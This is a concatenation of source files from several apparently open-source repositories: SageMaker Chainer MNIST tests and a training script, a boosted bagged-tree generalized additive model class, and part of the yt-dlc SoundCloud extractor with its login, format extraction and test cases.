test_arrays = [np.zeros((100, 784), dtype='float32'),
np.zeros((100, 1, 28, 28), dtype='float32'),
np.zeros((100, 28, 28), dtype='float32')]
with test_utils.local_mode_lock():
try:
predictor = _json_predictor(estimator, instance_type)
for array in test_arrays:
response = predictor.predict(array)
assert len(response) == len(array)
finally:
predictor.delete_endpoint()
def test_chainer_mnist_custom_loop(docker_image, sagemaker_local_session, instance_type, tmpdir):
customer_script = 'single_machine_custom_loop.py'
hyperparameters = {'batch-size': 10000, 'epochs': 1}
estimator = Chainer(entry_point=customer_script,
source_dir=mnist_path,
role=role,
image_name=docker_image,
train_instance_count=1,
train_instance_type=instance_type,
sagemaker_session=sagemaker_local_session,
hyperparameters=hyperparameters,
output_path='file://{}'.format(tmpdir))
estimator.fit({'train': 'file://{}'.format(os.path.join(data_dir, 'train')),
'test': 'file://{}'.format(os.path.join(data_dir, 'test'))})
success_files = {
'model': ['model.npz'],
'output': ['success'],
}
test_utils.files_exist(str(tmpdir), success_files)
request_data = np.zeros((100, 784), dtype='float32')
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type)
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type,
json_serializer, json_deserializer,
'application/json')
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type,
csv_serializer, csv_deserializer, 'text/csv')
@pytest.mark.parametrize('customer_script',
['distributed_customer_script.py',
'distributed_customer_script_with_env_vars.py'])
def test_chainer_mnist_distributed(docker_image, sagemaker_local_session, instance_type,
customer_script, tmpdir):
if instance_type == 'local_gpu':
pytest.skip('Local Mode does not support distributed GPU training.')
# pure_nccl communicator hangs when only one gpu is available.
cluster_size = 2
hyperparameters = {'sagemaker_process_slots_per_host': 1,
'sagemaker_num_processes': cluster_size,
'batch-size': 10000,
'epochs': 1,
'communicator': 'hierarchical'}
estimator = Chainer(entry_point=customer_script,
source_dir=mnist_path,
role=role,
image_name=docker_image,
train_instance_count=cluster_size,
train_instance_type=instance_type,
sagemaker_session=sagemaker_local_session,
hyperparameters=hyperparameters,
output_path='file://{}'.format(tmpdir))
estimator.fit({'train': 'file://{}'.format(os.path.join(data_dir, 'train')),
'test': 'file://{}'.format(os.path.join(data_dir, 'test'))})
success_files = {
'model': ['model.npz'],
'output': ['success', 'data/accuracy.png', 'data/cg.dot', 'data/log', 'data/loss.png'],
}
test_utils.files_exist(str(tmpdir), success_files)
request_data = np.zeros((100, 784), dtype='float32')
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type)
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type,
json_serializer, json_deserializer,
'application/json')
test_utils.predict_and_assert_response_length(estimator, request_data, instance_type,
csv_serializer, csv_deserializer, 'text/csv')
def _json_predictor(estimator, instance_type):
predictor = estimator.deploy(1, instance_type)
predictor.content_type = 'application/json'
predictor.serializer = json_serializer
predictor.accept = 'application/json'
predictor.deserializer = json_deserializer
return predictor
```
#### File: resources/mnist/distributed_customer_script.py
```python
from __future__ import print_function, absolute_import
import argparse
import logging
import os
import chainer
from chainer import serializers, training
from chainer.datasets import tuple_dataset
import chainer.functions as F
import chainer.links as L
from chainer.training import extensions
import chainermn
import numpy as np
import sagemaker_containers
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
class MLP(chainer.Chain):
def __init__(self, n_units, n_out):
super(MLP, self).__init__()
with self.init_scope():
# the size of the inputs to each layer will be inferred
self.l1 = L.Linear(None, n_units) # n_in -> n_units
self.l2 = L.Linear(None, n_units) # n_units -> n_units
self.l3 = L.Linear(None, n_out) # n_units -> n_out
def __call__(self, x):
h1 = F.relu(self.l1(x))
h2 = F.relu(self.l2(h1))
return self.l3(h2)
def _preprocess_mnist(raw, withlabel, ndim, scale, image_dtype, label_dtype, rgb_format):
images = raw['x']
if ndim == 2:
images = images.reshape(-1, 28, 28)
elif ndim == 3:
images = images.reshape(-1, 1, 28, 28)
if rgb_format:
images = np.broadcast_to(images, (len(images), 3) + images.shape[2:])
elif ndim != 1:
raise ValueError('invalid ndim for MNIST dataset')
images = images.astype(image_dtype)
images *= scale / 255.
if withlabel:
labels = raw['y'].astype(label_dtype)
return tuple_dataset.TupleDataset(images, labels)
return images
if __name__ == '__main__':
env = sagemaker_containers.training_env()
parser = argparse.ArgumentParser()
# Data and model checkpoints directories
parser.add_argument('--epochs', type=int)
parser.add_argument('--batch-size', type=int)
parser.add_argument('--communicator', type=str, default='pure_nccl')
parser.add_argument('--frequency', type=int, default=20)
parser.add_argument('--units', type=int, default=1000)
parser.add_argument('--model-dir', type=str)
parser.add_argument('--output-data-dir', type=str, default=env.output_data_dir)
parser.add_argument('--host', type=str, default=env.current_host)
parser.add_argument('--num-gpus', type=int, default=env.num_gpus)
parser.add_argument('--train', type=str, default=env.channel_input_dirs['train'])
parser.add_argument('--test', type=str, default=env.channel_input_dirs['test'])
args = parser.parse_args()
train_file = np.load(os.path.join(args.train, 'train.npz'))
test_file = np.load(os.path.join(args.test, 'test.npz'))
logger.info('Current host: {}'.format(args.host))
communicator = 'naive' if args.num_gpus == 0 else args.communicator
comm = chainermn.create_communicator(communicator)
device = comm.intra_rank if args.num_gpus > 0 else -1
print('==========================================')
print('Using {} communicator'.format(comm))
print('Num unit: {}'.format(args.units))
print('Num Minibatch-size: {}'.format(args.batch_size))
print('Num epoch: {}'.format(args.epochs))
print('==========================================')
model = L.Classifier(MLP(args.units, 10))
if device >= 0:
chainer.cuda.get_device(device).use()
# Create a multi node optimizer from a standard Chainer optimizer.
optimizer = chainermn.create_multi_node_optimizer(
chainer.optimizers.Adam(), comm)
optimizer.setup(model)
train_file = np.load(os.path.join(args.train, 'train.npz'))
test_file = np.load(os.path.join(args.test, 'test.npz'))
preprocess_mnist_options = {
'withlabel': True,
'ndim': 1,
'scale': 1.,
'image_dtype': np.float32,
'label_dtype': np.int32,
'rgb_format': False
}
train_dataset = _preprocess_mnist(train_file, **preprocess_mnist_options)
test_dataset = _preprocess_mnist(test_file, **preprocess_mnist_options)
train_iter = chainer.iterators.SerialIterator(train_dataset, args.batch_size)
test_iter = chainer.iterators.SerialIterator(
test_dataset, args.batch_size, repeat=False, shuffle=False)
updater = training.StandardUpdater(train_iter, optimizer, device=device)
trainer = training.Trainer(updater, (args.epochs, 'epoch'), out=args.output_data_dir)
# Create a multi node evaluator from a standard Chainer evaluator.
evaluator = extensions.Evaluator(test_iter, model, device=device)
evaluator = chainermn.create_multi_node_evaluator(evaluator, comm)
trainer.extend(evaluator)
# Some display and output extensions are necessary only for one worker.
# (Otherwise, there would just be repeated outputs.)
if comm.rank == 0:
if extensions.PlotReport.available():
trainer.extend(
extensions.PlotReport(
['main/loss', 'validation/main/loss'],
'epoch',
file_name='loss.png'))
trainer.extend(
extensions.PlotReport(
['main/accuracy', 'validation/main/accuracy'],
'epoch',
file_name='accuracy.png'))
trainer.extend(extensions.snapshot(), trigger=(args.frequency, 'epoch'))
trainer.extend(extensions.dump_graph('main/loss'))
trainer.extend(extensions.LogReport())
trainer.extend(
extensions.PrintReport([
'epoch', 'main/loss', 'validation/main/loss', 'main/accuracy',
'validation/main/accuracy', 'elapsed_time'
]))
trainer.extend(extensions.ProgressBar())
trainer.run()
# only save the model in the master node
if args.host == str(env.hosts[0]):
serializers.save_npz(os.path.join(env.model_dir, 'model.npz'), model)
def model_fn(model_dir):
model = L.Classifier(MLP(1000, 10))
serializers.load_npz(os.path.join(model_dir, 'model.npz'), model)
return model.predictor
```
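A hedged sketch of loading the saved model through `model_fn` and running a single prediction outside the serving container; the model directory path is a placeholder and the input follows the script's flattened (N, 784) MNIST shape.

```python
# Sketch of reusing model_fn() from this script; '/opt/ml/model' is a placeholder path.
import numpy as np
import chainer

predictor = model_fn('/opt/ml/model')
sample = np.zeros((1, 784), dtype=np.float32)
with chainer.using_config('train', False):
    logits = predictor(sample)            # forward pass through the MLP
print(logits.data.argmax(axis=1))         # predicted digit class
```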
|
{
"source": "jesterhui/interpretable_ml_description_chemisorption_alloys",
"score": 3
}
|
#### File: interpretable_ml_description_chemisorption_alloys/src/bst_bag_tree.py
```python
import itertools as it
import numpy as np
from sklearn.tree import DecisionTreeRegressor
class BoostedBaggedTreeGAM:
"""iGAM for inteliigible models.
Attributes:
model (dict): Dictionary containing constituent trees of model.
m_boost (int): Number of iterations for gradient boosting.
n_leaves (int): Number of leaves in each tree.
n_trees (int): Number of bagged trees for each shaping function.
"""
def __init__(self, m_boost, n_leaves=2, n_trees=100, pairwise=0):
"""
Args:
m_boost (int): Number of iterations for gradient boosting.
n_leaves (int): Number of leaves in each tree.
n_trees (int): Number of bagged trees for each shaping function.
pairwise (int): Number of pairwise interactions to include.
"""
self.model = {}
self.pairwise = pairwise
self.pairwise_model = {}
self.pairwise_inds = {}
self.m_boost = m_boost
self.n_leaves = n_leaves
self.n_trees = n_trees
self.y_avg = None
def fit(self, x_train, y_train):
"""Train model.
Args:
x_train (obj): (n, d) NumPy array containing training input
samples.
y_train (obj): (n, 1) Numpy vector containing target values.
"""
self.y_avg = np.mean(y_train)
n_samples, d_features = x_train.shape
# build model dictionary
for j in range(d_features):
self.model[j] = []
# fill model dictionary with decision trees
for _ in range(self.m_boost):
for j in range(d_features):
bagged_trees = []
for _ in range(self.n_trees):
# bootstrap sampling
ind = np.random.randint(n_samples,
size=n_samples)
x_sample = x_train[ind, :]
# boosting
y_sample = (y_train[ind, :].reshape(-1, 1)
- self.predict(x_sample))
x_sample = x_train[ind, j].reshape(-1, 1)
f_j = DecisionTreeRegressor(max_leaf_nodes=self.n_leaves)
f_j.fit(x_sample, y_sample)
bagged_trees.append(f_j)
self.model[j].append(bagged_trees)
if self.pairwise > 0:
self.train_pairwise(x_train, y_train, self.pairwise)
def predict(self, x_pred):
"""Use learned model to label data.
Args:
x_pred (obj): (n, d) NumPy array of test samples.
Returns:
obj: (n, 1) NumPy vector containging predictions.
"""
# sum over model contributions for each feature
y_pred = self.y_avg
for j in self.model:
for m_iter in self.model[j]:
for f_j in m_iter:
y_pred = y_pred + (f_j.predict(x_pred[:, j].reshape(-1, 1))
.reshape(-1, 1) / self.n_trees)
for key in self.pairwise_inds:
x_pred_p = x_pred[:, self.pairwise_inds[key]]
for f_j in self.pairwise_model[key]:
y_pred = y_pred + (f_j.predict(x_pred_p)
.reshape(-1, 1) / self.n_trees)
return y_pred
def feature_contribution(self, x_feat, j_feat):
"""Obtain contribution of individual feature to overall prediction.
Args:
x_feat (type): Feature data.
j_feat (int): Index of feature.
Returns:
obj: (n, 1) NumPy vector containing feature contribution.
"""
# perform prediction for a single variable
y_feat = 0
for m_iter in self.model[j_feat]:
for f_j in m_iter:
y_feat = y_feat + (f_j.predict(x_feat[:, j_feat].reshape(-1, 1)
).reshape(-1, 1) / self.n_trees)
return y_feat
def pair_contribution(self, x_feat, j_pair):
"""Obtain contribution of individual feature to overall prediction.
Args:
x_feat (type): Feature data.
j_feat (int): Index of feature.
Returns:
obj: (n, 1) NumPy vector containing feature contrbution.
"""
# peform prediction for single variable
y_pair = 0
print(self.pairwise_inds[j_pair])
x_pred_p = x_feat[:, self.pairwise_inds[j_pair]]
for f_j in self.pairwise_model[j_pair]:
y_pair = y_pair + (f_j.predict(x_pred_p)
.reshape(-1, 1) / self.n_trees)
return y_pair
def get_weights(self, x_w):
"""Get feature weights of iGAM model.
Args:
x_w (obj): NumPy array containing samples used to estimate weights.
Returns:
obj: (n, ) NumPy vector containing weights.
"""
n_samples, n_features = x_w.shape
weights = np.zeros(n_features,)
for j in range(n_features):
f_x = self.feature_contribution(x_w, j)
weights[j] = np.sqrt((1 / n_samples) * np.sum(f_x ** 2))
return weights
def train_pairwise(self, x_train, y_train, n_pairs):
"""Train pairwise interactions.
Args:
x_train (obj): (n, d) NumPy array containing training input
samples.
y_train (obj): (n, 1) Numpy vector containing target values.
n_pairs (int): Numer of pairwise interactions to include.
"""
n_samples, d_features = x_train.shape
possible_pairs = list(it.combinations(range(d_features), 2))
weights = self.get_weights(x_train)
sorted_weights = np.argsort(np.flip(np.argsort(weights)))
ranking = []
for pair in possible_pairs:
ranking.append(sorted_weights[pair[0]] + sorted_weights[pair[1]])
ranking = np.asarray(ranking)
for i in range(n_pairs):
best = np.argsort(ranking)[i]
best = possible_pairs[best]
bagged_trees = []
for _ in range(self.n_trees):
# bootstrap sampling
ind = np.random.randint(n_samples,
size=n_samples)
x_sample = x_train[ind, :]
# boosting
y_sample = (y_train[ind, :].reshape(-1, 1)
- self.predict(x_sample))
x_sample = x_sample[:, best]
f_j = DecisionTreeRegressor(max_leaf_nodes=4)
f_j.fit(x_sample, y_sample)
bagged_trees.append(f_j)
self.pairwise_model[i] = bagged_trees
self.pairwise_inds[i] = best
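# --- Hedged usage sketch (not part of the original module) ---
# Minimal end-to-end example: fit the GAM on synthetic data, score it, and
# read the per-feature weights. The data and hyperparameters are illustrative.
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    x_demo = rng.normal(size=(200, 3))
    y_demo = (2.0 * x_demo[:, [0]] - x_demo[:, [1]] ** 2
              + 0.1 * rng.normal(size=(200, 1)))
    gam = BoostedBaggedTreeGAM(m_boost=5, n_leaves=2, n_trees=10, pairwise=1)
    gam.fit(x_demo, y_demo)
    preds = gam.predict(x_demo)
    print('train RMSE:', float(np.sqrt(np.mean((preds - y_demo) ** 2))))
    print('feature weights:', gam.get_weights(x_demo))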
```
|
{
"source": "jesterjunk/yt-dlc",
"score": 2
}
|
#### File: youtube_dlc/extractor/soundcloud.py
```python
from __future__ import unicode_literals
import itertools
import re
import json
import random
from .common import (
InfoExtractor,
SearchInfoExtractor
)
from ..compat import (
compat_HTTPError,
compat_kwargs,
compat_str,
compat_urlparse,
)
from ..utils import (
error_to_compat_str,
ExtractorError,
float_or_none,
HEADRequest,
int_or_none,
KNOWN_EXTENSIONS,
mimetype2ext,
str_or_none,
try_get,
unified_timestamp,
update_url_query,
url_or_none,
urlhandle_detect_ext,
sanitized_Request,
)
class SoundcloudEmbedIE(InfoExtractor):
_VALID_URL = r'https?://(?:w|player|p)\.soundcloud\.com/player/?.*?\burl=(?P<id>.+)'
_TEST = {
# from https://www.soundi.fi/uutiset/ennakkokuuntelussa-timo-kaukolammen-station-to-station-to-station-julkaisua-juhlitaan-tanaan-g-livelabissa/
'url': 'https://w.soundcloud.com/player/?visual=true&url=https%3A%2F%2Fapi.soundcloud.com%2Fplaylists%2F922213810&show_artwork=true&maxwidth=640&maxheight=960&dnt=1&secret_token=s-ziYey',
'only_matching': True,
}
@staticmethod
def _extract_urls(webpage):
return [m.group('url') for m in re.finditer(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?://)?(?:w\.)?soundcloud\.com/player.+?)\1',
webpage)]
def _real_extract(self, url):
query = compat_urlparse.parse_qs(
compat_urlparse.urlparse(url).query)
api_url = query['url'][0]
secret_token = query.get('secret_token')
if secret_token:
api_url = update_url_query(api_url, {'secret_token': secret_token[0]})
return self.url_result(api_url)
class SoundcloudIE(InfoExtractor):
"""Information extractor for soundcloud.com
To access the media, the uid of the song and a stream token
must be extracted from the page source and the script must make
a request to media.soundcloud.com/crossdomain.xml. Then
the media can be grabbed by requesting a URL composed
of the stream token and uid
"""
_VALID_URL = r'''(?x)^(?:https?://)?
(?:(?:(?:www\.|m\.)?soundcloud\.com/
(?!stations/track)
(?P<uploader>[\w\d-]+)/
(?!(?:tracks|albums|sets(?:/.+?)?|reposts|likes|spotlight)/?(?:$|[?#]))
(?P<title>[\w\d-]+)/?
(?P<token>[^?]+?)?(?:[?].*)?$)
|(?:api(?:-v2)?\.soundcloud\.com/tracks/(?P<track_id>\d+)
(?:/?\?secret_token=(?P<secret_token>[^&]+))?)
)
'''
IE_NAME = 'soundcloud'
_TESTS = [
{
'url': 'http://soundcloud.com/ethmusic/lostin-powers-she-so-heavy',
'md5': 'ebef0a451b909710ed1d7787dddbf0d7',
'info_dict': {
'id': '62986583',
'ext': 'mp3',
'title': 'Lostin Powers - She so Heavy (SneakPreview) Adrian Ackers Blueprint 1',
'description': 'No Downloads untill we record the finished version this weekend, i was too pumped n i had to post it , earl is prolly gonna b hella p.o\'d',
'uploader': 'E.T. ExTerrestrial Music',
'uploader_id': '1571244',
'timestamp': 1349920598,
'upload_date': '20121011',
'duration': 143.216,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
}
},
# geo-restricted
{
'url': 'https://soundcloud.com/the-concept-band/goldrushed-mastered?in=the-concept-band/sets/the-royal-concept-ep',
'info_dict': {
'id': '47127627',
'ext': 'mp3',
'title': 'Goldrushed',
'description': 'From Stockholm Sweden\r\nPovel / Magnus / Filip / David\r\nwww.theroyalconcept.com',
'uploader': 'The Royal Concept',
'uploader_id': '9615865',
'timestamp': 1337635207,
'upload_date': '20120521',
'duration': 227.155,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link
{
'url': 'https://soundcloud.com/jaimemf/youtube-dlc-test-video-a-y-baw/s-8Pjrp',
'md5': 'aa0dd32bfea9b0c5ef4f02aacd080604',
'info_dict': {
'id': '123998367',
'ext': 'mp3',
'title': 'Youtube - Dl Test Video \'\' Ä↭',
'description': 'test chars: \"\'/\\ä↭',
'uploader': 'jaimeMF',
'uploader_id': '69767071',
'timestamp': 1386604920,
'upload_date': '20131209',
'duration': 9.927,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link (alt format)
{
'url': 'https://api.soundcloud.com/tracks/123998367?secret_token=s-8Pjrp',
'md5': 'aa0dd32bfea9b0c5ef4f02aacd080604',
'info_dict': {
'id': '123998367',
'ext': 'mp3',
'title': 'Youtube - Dl Test Video \'\' Ä↭',
'description': 'test chars: \"\'/\\ä↭',
'uploader': 'jaimeMF',
'uploader_id': '69767071',
'timestamp': 1386604920,
'upload_date': '20131209',
'duration': 9.927,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# downloadable song
{
'url': 'https://soundcloud.com/oddsamples/bus-brakes',
'md5': '7624f2351f8a3b2e7cd51522496e7631',
'info_dict': {
'id': '128590877',
'ext': 'mp3',
'title': 'Bus Brakes',
'description': 'md5:0053ca6396e8d2fd7b7e1595ef12ab66',
'uploader': 'oddsamples',
'uploader_id': '73680509',
'timestamp': 1389232924,
'upload_date': '20140109',
'duration': 17.346,
'license': 'cc-by-sa',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link, downloadable format
{
'url': 'https://soundcloud.com/oriuplift/uponly-238-no-talking-wav/s-AyZUd',
'md5': '64a60b16e617d41d0bef032b7f55441e',
'info_dict': {
'id': '340344461',
'ext': 'wav',
'title': 'Uplifting Only 238 [No Talking] (incl. Alex Feed Guestmix) (Aug 31, 2017) [wav]',
'description': 'md5:fa20ee0fca76a3d6df8c7e57f3715366',
'uploader': 'Ori Uplift Music',
'uploader_id': '12563093',
'timestamp': 1504206263,
'upload_date': '20170831',
'duration': 7449.096,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# no album art, use avatar pic for thumbnail
{
'url': 'https://soundcloud.com/garyvee/sideways-prod-mad-real',
'md5': '59c7872bc44e5d99b7211891664760c2',
'info_dict': {
'id': '309699954',
'ext': 'mp3',
'title': 'Sideways (Prod. Mad Real)',
'description': 'md5:d41d8cd98f00b204e9800998ecf8427e',
'uploader': 'garyvee',
'uploader_id': '2366352',
'timestamp': 1488152409,
'upload_date': '20170226',
'duration': 207.012,
'thumbnail': r're:https?://.*\.jpg',
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://soundcloud.com/giovannisarani/mezzo-valzer',
'md5': 'e22aecd2bc88e0e4e432d7dcc0a1abf7',
'info_dict': {
'id': '583011102',
'ext': 'mp3',
'title': 'Mezzo Valzer',
'description': 'md5:4138d582f81866a530317bae316e8b61',
'uploader': 'Micronie',
'uploader_id': '3352531',
'timestamp': 1551394171,
'upload_date': '20190228',
'duration': 180.157,
'thumbnail': r're:https?://.*\.jpg',
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
{
# AAC HQ format available (account with active subscription needed)
'url': 'https://soundcloud.com/wandw/the-chainsmokers-ft-daya-dont-let-me-down-ww-remix-1',
'only_matching': True,
},
{
# Go+ (account with active subscription needed)
'url': 'https://soundcloud.com/taylorswiftofficial/look-what-you-made-me-do',
'only_matching': True,
},
]
_API_V2_BASE = 'https://api-v2.soundcloud.com/'
_BASE_URL = 'https://soundcloud.com/'
_IMAGE_REPL_RE = r'-([0-9a-z]+)\.jpg'
_ARTWORK_MAP = {
'mini': 16,
'tiny': 20,
'small': 32,
'badge': 47,
't67x67': 67,
'large': 100,
't300x300': 300,
'crop': 400,
't500x500': 500,
'original': 0,
}
def _store_client_id(self, client_id):
self._downloader.cache.store('soundcloud', 'client_id', client_id)
def _update_client_id(self):
webpage = self._download_webpage('https://soundcloud.com/', None)
for src in reversed(re.findall(r'<script[^>]+src="([^"]+)"', webpage)):
script = self._download_webpage(src, None, fatal=False)
if script:
client_id = self._search_regex(
r'client_id\s*:\s*"([0-9a-zA-Z]{32})"',
script, 'client id', default=None)
if client_id:
self._CLIENT_ID = client_id
self._store_client_id(client_id)
return
raise ExtractorError('Unable to extract client id')
def _download_json(self, *args, **kwargs):
non_fatal = kwargs.get('fatal') is False
if non_fatal:
del kwargs['fatal']
query = kwargs.get('query', {}).copy()
for _ in range(2):
query['client_id'] = self._CLIENT_ID
kwargs['query'] = query
try:
return super(SoundcloudIE, self)._download_json(*args, **compat_kwargs(kwargs))
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 401:
self._store_client_id(None)
self._update_client_id()
continue
elif non_fatal:
self._downloader.report_warning(error_to_compat_str(e))
return False
raise
def _real_initialize(self):
self._CLIENT_ID = self._downloader.cache.load('soundcloud', 'client_id') or "T5R4kgWS2PRf6lzLyIravUMnKlbIxQag" # 'EXLwg5lHTO2dslU5EePe3xkw0m1h86Cd' # 'YUKXoArFcqrlQn9tfNHvvyfnDISj04zk'
self._login()
_USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36"
_API_AUTH_QUERY_TEMPLATE = '?client_id=%s'
_API_AUTH_URL_PW = 'https://api-auth.soundcloud.com/web-auth/sign-in/password%s'
_access_token = None
_HEADERS = {}
_NETRC_MACHINE = 'soundcloud'
def _login(self):
username, password = self._get_login_info()
if username is None:
return
def genDevId():
def genNumBlock():
return ''.join([str(random.randrange(10)) for i in range(6)])
return '-'.join([genNumBlock() for i in range(4)])
payload = {
'client_id': self._CLIENT_ID,
'recaptcha_pubkey': 'null',
'recaptcha_response': 'null',
'credentials': {
'identifier': username,
'password': password
},
'signature': self.sign(username, password, self._CLIENT_ID),
'device_id': genDevId(),
'user_agent': self._USER_AGENT
}
query = self._API_AUTH_QUERY_TEMPLATE % self._CLIENT_ID
login = sanitized_Request(self._API_AUTH_URL_PW % query, json.dumps(payload).encode('utf-8'))
response = self._download_json(login, None)
self._access_token = response.get('session').get('access_token')
if not self._access_token:
self.report_warning('Unable to get access token, login may have failed')
else:
self._HEADERS = {'Authorization': 'OAuth ' + self._access_token}
# signature generation
def sign(self, user, pw, clid):
a = 33
i = 1
s = 440123
w = 117
u = 1800000
l = 1042
b = 37
k = 37
c = 5
n = "<KEY>" # _KEY
y = "8" # _REV
r = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" # _USER_AGENT
e = user # _USERNAME
t = clid # _CLIENT_ID
d = '-'.join([str(mInt) for mInt in [a, i, s, w, u, l, b, k]])
p = n + y + d + r + e + t + d + n
h = p
m = 8011470
f = 0
for f in range(f, len(h)):
m = (m >> 1) + ((1 & m) << 23)
m += ord(h[f])
m &= 16777215
# c is not even needed
out = str(y) + ':' + str(d) + ':' + format(m, 'x') + ':' + str(c)
return out
@classmethod
def _resolv_url(cls, url):
return SoundcloudIE._API_V2_BASE + 'resolve?url=' + url
def _extract_info_dict(self, info, full_title=None, secret_token=None):
track_id = compat_str(info['id'])
title = info['title']
format_urls = set()
formats = []
query = {'client_id': self._CLIENT_ID}
if secret_token:
query['secret_token'] = secret_token
if info.get('downloadable') and info.get('has_downloads_left'):
download_url = update_url_query(
self._API_V2_BASE + 'tracks/' + track_id + '/download', query)
redirect_url = (self._download_json(download_url, track_id, fatal=False) or {}).get('redirectUri')
if redirect_url:
urlh = self._request_webpage(
HEADRequest(redirect_url), track_id, fatal=False)
if urlh:
format_url = urlh.geturl()
format_urls.add(format_url)
formats.append({
'format_id': 'download',
'ext': urlhandle_detect_ext(urlh) or 'mp3',
'filesize': int_or_none(urlh.headers.get('Content-Length')),
'url': format_url,
'preference': 10,
})
def invalid_url(url):
return not url or url in format_urls
def add_format(f, protocol, is_preview=False):
mobj = re.search(r'\.(?P<abr>\d+)\.(?P<ext>[0-9a-z]{3,4})(?=[/?])', stream_url)
if mobj:
for k, v in mobj.groupdict().items():
if not f.get(k):
f[k] = v
format_id_list = []
if protocol:
format_id_list.append(protocol)
ext = f.get('ext')
if ext == 'aac':
f['abr'] = '256'
for k in ('ext', 'abr'):
v = f.get(k)
if v:
format_id_list.append(v)
preview = is_preview or re.search(r'/(?:preview|playlist)/0/30/', f['url'])
if preview:
format_id_list.append('preview')
abr = f.get('abr')
if abr:
f['abr'] = int(abr)
if protocol == 'hls':
protocol = 'm3u8' if ext == 'aac' else 'm3u8_native'
else:
protocol = 'http'
f.update({
'format_id': '_'.join(format_id_list),
'protocol': protocol,
'preference': -10 if preview else None,
})
formats.append(f)
# New API
transcodings = try_get(
info, lambda x: x['media']['transcodings'], list) or []
for t in transcodings:
if not isinstance(t, dict):
continue
format_url = url_or_none(t.get('url'))
if not format_url:
continue
stream = self._download_json(
format_url, track_id, query=query, fatal=False, headers=self._HEADERS)
if not isinstance(stream, dict):
continue
stream_url = url_or_none(stream.get('url'))
if invalid_url(stream_url):
continue
format_urls.add(stream_url)
stream_format = t.get('format') or {}
protocol = stream_format.get('protocol')
if protocol != 'hls' and '/hls' in format_url:
protocol = 'hls'
ext = None
preset = str_or_none(t.get('preset'))
if preset:
ext = preset.split('_')[0]
if ext not in KNOWN_EXTENSIONS:
ext = mimetype2ext(stream_format.get('mime_type'))
add_format({
'url': stream_url,
'ext': ext,
}, 'http' if protocol == 'progressive' else protocol,
t.get('snipped') or '/preview/' in format_url)
for f in formats:
f['vcodec'] = 'none'
if not formats and info.get('policy') == 'BLOCK':
self.raise_geo_restricted()
self._sort_formats(formats)
user = info.get('user') or {}
thumbnails = []
artwork_url = info.get('artwork_url')
thumbnail = artwork_url or user.get('avatar_url')
if isinstance(thumbnail, compat_str):
if re.search(self._IMAGE_REPL_RE, thumbnail):
for image_id, size in self._ARTWORK_MAP.items():
i = {
'id': image_id,
'url': re.sub(self._IMAGE_REPL_RE, '-%s.jpg' % image_id, thumbnail),
}
if image_id == 'tiny' and not artwork_url:
size = 18
elif image_id == 'original':
i['preference'] = 10
if size:
i.update({
'width': size,
'height': size,
})
thumbnails.append(i)
else:
thumbnails = [{'url': thumbnail}]
def extract_count(key):
return int_or_none(info.get('%s_count' % key))
return {
'id': track_id,
'uploader': user.get('username'),
'uploader_id': str_or_none(user.get('id')) or user.get('permalink'),
'uploader_url': user.get('permalink_url'),
'timestamp': unified_timestamp(info.get('created_at')),
'title': title,
'description': info.get('description'),
'thumbnails': thumbnails,
'duration': float_or_none(info.get('duration'), 1000),
'webpage_url': info.get('permalink_url'),
'license': info.get('license'),
'view_count': extract_count('playback'),
'like_count': extract_count('favoritings') or extract_count('likes'),
'comment_count': extract_count('comment'),
'repost_count': extract_count('reposts'),
'genre': info.get('genre'),
'formats': formats
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
track_id = mobj.group('track_id')
query = {}
if track_id:
info_json_url = self._API_V2_BASE + 'tracks/' + track_id
full_title = track_id
token = mobj.group('secret_token')
if token:
query['secret_token'] = token
else:
full_title = resolve_title = '%s/%s' % mobj.group('uploader', 'title')
token = mobj.group('token')
if token:
resolve_title += '/%s' % token
info_json_url = self._resolv_url(self._BASE_URL + resolve_title)
info = self._download_json(
info_json_url, full_title, 'Downloading info JSON', query=query, headers=self._HEADERS)
return self._extract_info_dict(info, full_title, token)
class SoundcloudPlaylistBaseIE(SoundcloudIE):
def _extract_set(self, playlist, token=None):
playlist_id = compat_str(playlist['id'])
tracks = playlist.get('tracks') or []
if not all([t.get('permalink_url') for t in tracks]) and token:
tracks = self._download_json(
self._API_V2_BASE + 'tracks', playlist_id,
'Downloading tracks', query={
'ids': ','.join([compat_str(t['id']) for t in tracks]),
'playlistId': playlist_id,
'playlistSecretToken': token,
}, headers=self._HEADERS)
entries = []
for track in tracks:
track_id = str_or_none(track.get('id'))
url = track.get('permalink_url')
if not url:
if not track_id:
continue
url = self._API_V2_BASE + 'tracks/' + track_id
if token:
url += '?secret_token=' + token
entries.append(self.url_result(
url, SoundcloudIE.ie_key(), track_id))
return self.playlist_result(
entries, playlist_id,
playlist.get('title'),
playlist.get('description'))
class SoundcloudSetIE(SoundcloudPlaylistBaseIE):
_VALID_URL = r'https?://(?:(?:www|m)\.)?soundcloud\.com/(?P<uploader>[\w\d-]+)/sets/(?P<slug_title>[:\w\d-]+)(?:/(?P<token>[^?/]+))?'
IE_NAME = 'soundcloud:set'
_TESTS = [{
